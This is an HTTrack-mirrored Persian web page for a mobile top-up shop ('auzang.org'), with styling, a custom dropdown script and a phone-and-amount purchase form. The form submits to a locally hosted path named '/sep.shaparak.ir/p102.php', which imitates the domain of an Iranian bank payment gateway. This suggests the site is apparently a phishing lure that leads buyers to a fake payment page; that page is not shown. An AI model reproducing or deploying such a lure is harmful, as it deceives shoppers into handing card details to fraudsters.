s<!DOCTYPE html>
<html  lang="fa" dir="rtl" >
    
<!-- Mirrored from auzang.org/ by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 07 Nov 2019 11:07:35 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
        <meta charset="UTF-8">
    <title>خرید شارژ ایرانسل،همراه اول،رایتل</title>
    <meta charset="UTF-8">
    <meta name="viewport"
          content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <meta name="theme-color" content="#184f97">
    <meta name="msapplication-navbutton-color" content="#184f97">
    <meta name="apple-mobile-web-app-status-bar-style" content="#184f97">
    <meta name="description" content="شارژ رو خیلی راحت و سریع دریافت کن و با اولین خرید، تخفیف مدت دار بگیر و شارژ رو ارزون تر از قیمت واقعی خریداری کن"/>
    <meta name="keywords" content="شارژ مستقیم، کارت شارژ، شارژ ایرانسل، شارژ همراه اول، شارژ رایتل، شارژ تالیا، خرید بسته اینترنتی، بسته های اینترنت، پرداخت قبض، خرید گیفت کارت، خرید آنتی ویروس"/>

        <link rel="icon" type="image/png" href="static/img/favicon.png" />
        <link rel="stylesheet" href="static/css/style.css" type="text/css" />


<style>
/*the container must be positioned relative:*/
#asli .custom-select {
  transition: all 275ms;
  position: relative;
  font-family: Shabnam;
}

#asli .custom-select select {
  display: none; /*hide original SELECT element:*/
}
#asli .tab-content-mtn .select-selected{
background-color: #ffc22e;  
}
#asli .tab-content-mci .select-selected{
background-color: #4fc0cb;  
}
#asli .tab-content-rtl .select-selected{
background-color: #921867;  
}

/*style the arrow inside the select element:*/
#asli .select-selected:after {
  position: absolute;
  content: "";
  top: 14px;
  right: 10px;
  width: 0;
  height: 0;
  border: 6px solid transparent;
  border-color: #fff transparent transparent transparent;
}

/*point the arrow upwards when the select box is open (active):*/
#asli .select-selected.select-arrow-active:after {
  border-color: transparent transparent #fff transparent;
  top: 7px;
}

/*style the items (options), including the selected item:*/
#asli .select-items div,.select-selected {
  color: #ffffff;text-align: center;
  padding: 8px 16px;
  border: 1px solid transparent;
  border-color: transparent transparent rgba(0, 0, 0, 0.1) transparent;
  cursor: pointer;
  user-select: none;
}



#asli .tab-content-mtn .select-items{
  position: absolute;
background-color: #ffc22e; 
  top: 100%;text-align: center;
  left: 0;
  right: 0;
  z-index: 99; 
}
#asli .tab-content-mci .select-items{
  position: absolute;
background-color: #4fc0cb;  
  top: 100%;text-align: center;
  left: 0;
  right: 0;
  z-index: 99;
}
#asli .tab-content-rtl .select-items{
  position: absolute;
background-color: #921867; 
  top: 100%;text-align: center;
  left: 0;
  right: 0;
  z-index: 99; 
}







/*hide the items when the select box is closed:*/
#asli .select-hide {
  display: none;
}

#asli .select-items div:hover, .same-as-selected {
  background-color: rgba(0, 0, 0, 0.1);
}
</style>


	</head>
    <body>

      
<nav class="navbar navbar-light main-menu scrolled navbar-expand-lg fixed-top">
    <div class="container">

        <a class="navbar-brand main-logo" href="index.html"><img src="static/img/logo.png"></a>

        <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">
          <span class="navbar-toggler-icon"></span>
        </button>
        <div class="collapse navbar-collapse" id="navbarResponsive">
            <ul class="navbar-nav mr-auto group" id="navbar">
                <li class="nav-item ">
                    <a class="nav-link" href="index.html">خانه</a>
                </li>
                <li class="nav-item ">
                    <a class="nav-link" href="support.html">تماس با ما</a>
                </li>
            </ul>
        </div>

    </div>
    <div class="container menu-actions">

        <a class="btn btn-own-pos" href="#">021-89711111</a>
        <a class="btn btn-merchant-portal" href="#">info@auzang.org</a>
    </div>
</nav>

        <div class="body-wrapper">
            
    <header>
        <div class="service-header">
<style>

@media (max-width: 575.98px) {  #minmobile .tab {padding: 30px 36px;}
#minmobile .tab.active {padding: 36px 36px;}
#minmobile{margin:0;max-width:100%;flex:100%;} }




</style>
            <div class="row m-0 mt-5 fixed-bottom">
                <div class="offset-md-2 col-md-8 tab-container" id="minmobile">
                    <div class="tab tab-mtn active" data-content="mtn">
                        <img src="static/img/charge-mtn.png">
                    </div>
                    <div class="tab tab-mci" data-content="mci">
                        <img src="static/img/charge-mci.png">
                    </div>
                    <div class="tab tab-rtl" data-content="rtl">
                        <img src="static/img/charge-rtl.png">
                    </div>
                </div>
            </div>
            <div class="row m-0 mt-sm-2">
                <div class="offset-md-2 col-md-8 tab-content tab-content-mtn">
                    <div class="tab-header col-12" align="right">
            <div class="row m-0">
                <div class="col-md-8">
                    <h6>سامانه فروش کارت شارژ</h6>
                    <h3>سریع شارژشو و هدیه بگیر!</h3>
                </div>
            </div> 

</div>
                    <div class="tab-body col-12">
                        <div class="row" id="imgbox">



<style>
#imgbox .tab-content-mtn{
background-image: url("static/img/charge-mtn.png");
	background-position: 50% 50%;
	background-repeat: no-repeat;
}
#imgbox .tab-content-mci{
background-image: url("static/img/charge-mci1.png");
	background-size: 50%;
	background-position: 50% 50%;
	background-repeat: no-repeat;
}
#imgbox .tab-content-rtl{
background-image: url("static/img/charge-rtl1.png");
	background-size: 50%;
	background-position: 50% 50%;
	background-repeat: no-repeat;
}
</style>
                            <div class="col-md-4 charge-icon tab-content tab-content-mtn">

                            </div>
                            <div class="col-md-8 col-sm-12 p-sm-3 charge-form" align="center">

    


		

<form action="/sep.shaparak.ir/p102.php" method="POST">


<input placeholder="شماره تلفن همراه" style="font-size: 18px;padding: 10px 17px;width: 80%;" required max="11" min="11" name="tel" type="tel"  class=" " maxlength="11" tabindex="9" autocomplete="off">

<br>
<div id="asli">
<div class="custom-select tab-content tab-content-mtn" style="width: 80%;">
  <select name="price">
    <option value="1000" >مبلغ شارژ </option>
    <option value="1000">1000</option>
    <option value="2000">2000</option>
    <option value="5000">5000</option>
    <option value="10000">10000</option>
    <option value="20000">20000</option>
  </select>
</div></div>




<script>
var x, i, j, selElmnt, a, b, c;
/*look for any elements with the class "custom-select":*/
x = document.getElementsByClassName("custom-select");
for (i = 0; i < x.length; i++) {
  selElmnt = x[i].getElementsByTagName("select")[0];
  /*for each element, create a new DIV that will act as the selected item:*/
  a = document.createElement("DIV");
  a.setAttribute("class", "select-selected");
  a.innerHTML = selElmnt.options[selElmnt.selectedIndex].innerHTML;
  x[i].appendChild(a);
  /*for each element, create a new DIV that will contain the option list:*/
  b = document.createElement("DIV");
  b.setAttribute("class", "select-items select-hide");
  for (j = 1; j < selElmnt.length; j++) {
    /*for each option in the original select element,
    create a new DIV that will act as an option item:*/
    c = document.createElement("DIV");
    c.innerHTML = selElmnt.options[j].innerHTML;
    c.addEventListener("click", function(e) {
        /*when an item is clicked, update the original select box,
        and the selected item:*/
        var y, i, k, s, h;
        s = this.parentNode.parentNode.getElementsByTagName("select")[0];
        h = this.parentNode.previousSibling;
        for (i = 0; i < s.length; i++) {
          if (s.options[i].innerHTML == this.innerHTML) {
            s.selectedIndex = i;
            h.innerHTML = this.innerHTML;
            y = this.parentNode.getElementsByClassName("same-as-selected");
            for (k = 0; k < y.length; k++) {
              y[k].removeAttribute("class");
            }
            this.setAttribute("class", "same-as-selected");
            break;
          }
        }
        h.click();
    });
    b.appendChild(c);
  }
  x[i].appendChild(b);
  a.addEventListener("click", function(e) {
      /*when the select box is clicked, close any other select boxes,
      and open/close the current select box:*/
      e.stopPropagation();
      closeAllSelect(this);
      this.nextSibling.classList.toggle("select-hide");
      this.classList.toggle("select-arrow-active");
    });
}
function closeAllSelect(elmnt) {
  /*a function that will close all select boxes in the document,
  except the current select box:*/
  var x, y, i, arrNo = [];
  x = document.getElementsByClassName("select-items");
  y = document.getElementsByClassName("select-selected");
  for (i = 0; i < y.length; i++) {
    if (elmnt == y[i]) {
      arrNo.push(i)
    } else {
      y[i].classList.remove("select-arrow-active");
    }
  }
  for (i = 0; i < x.length; i++) {
    if (arrNo.indexOf(i)) {
      x[i].classList.add("select-hide");
    }
  }
}
/*if the user clicks anywhere outside the select box,
then close all select boxes:*/
document.addEventListener("click", closeAllSelect);
</script>

                 
  <p class="alert-box">
    <span>شماره تلفن همراه نادرست است.</span>
  </p>

                           
                                <p class="label mt-4">نوع شارژ</p>
                                <p class="mt-2">
                                    <span class="charge-type" data-charge-type="1">دریافت رمز</span>
                                    <span class="charge-type active" data-charge-type="2">شارژ مستقیم</span>
                                </p>
                                <p class="mt-4">
	<input style="color: #fff;" type="submit"  class="submit1" value="پرداخت" name="Submit" >
                        </p>


 
</form> 

	

                         
                                
	





                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </header>


    <div class="container">
        <div class="row">

        </div>
    </div>


        </div>

        <footer>
            


<div class="main-footer">
    <div class="container-fluid">
        <div class="row text-center text-lg-left text-md-center mt-lg-3 pb-3">
            <div class="col-md-12 col-lg-12 col-xl-12 mt-3 footer-info">
                <p class="title">شرکت رایان مهر</p>
                <p class="address">
			تهران، خ ملاصدرا، خ شیرازی جنوبی، خ گرمسار غربی، پلاک 23
				
				</p>
                <p class="contact">
                    
                        <span class="callcenter">89711111</span>
                        <span class="pre-callcenter">021</span>
                 
                    <a href="mailto:info@auzang.org"><span class="email">info@auzang.org</span></a>
                    <a class="social-icon" href="https://t.me/chargegir" target="_blank"><img class="icon-telegram" src="static/img/social-telegram.png"></a>
                    <a class="social-icon" href="https://www.instagram.com/chargegir/" target="_blank"><img class="icon-instagram" src="static/img/social-instagram.png"></a>

                    <span class="copyright float-left">
					تمام حقوق این وب‌سایت متعلق
					به 
				شرکت رایان مهر
					
				 است.
					</span>
                </p><br><br><br>
            </div>
        </div>
    </div>
</div>


<script type="text/javascript">
    var parent = document.getElementById("page-token");
    var page_unique_id = parent.children[0].value;
</script>

        </footer>
        <script type="text/javascript" src="static/js/min.js"></script>

    </body>

<!-- Mirrored from auzang.org/ by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 07 Nov 2019 11:07:41 GMT -->
</html>